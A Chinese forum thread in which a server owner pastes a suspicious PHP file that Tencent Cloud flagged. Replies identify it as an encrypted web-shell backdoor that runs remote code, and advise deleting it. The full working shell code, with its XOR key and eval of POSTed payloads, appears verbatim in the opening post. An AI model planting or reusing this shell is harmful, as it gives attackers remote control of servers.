腾讯云提示我服务器自己多了个病毒文件,麻烦帮我看看是不是

查看 49|回复 4
作者:QQVa064   
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
if(isset($_GET['phpinfo'])) {
    phpinfo();
        }
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
        eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
                  $_SESSION[$payloadName]=encode($data,$key);
              }
          }
      }
exit('77770123');

帮我, 腾讯

QQVa064
OP
  
麻烦帮忙看看这是想干嘛?
麦洛洛的吉他   
禁用错误报告和时间限制,隐藏潜在的问题。
可能泄露服务器配置信息。
执行任意代码,可能导致远程代码执行(RCE)漏洞。
使用Base64编码和解码,可能用于隐藏恶意内容。
使用MD5哈希和分割输出,可能是为了混淆和验证。
QQYB575   
典型的PHP一句话变种木马  直接删了就是
星期一   
这段PHP代码包含了多个潜在的安全漏洞,主要用于处理会话、解码并执行经过特定加密的输入数据。
您需要登录后才可以回帖 登录 | 立即注册

返回顶部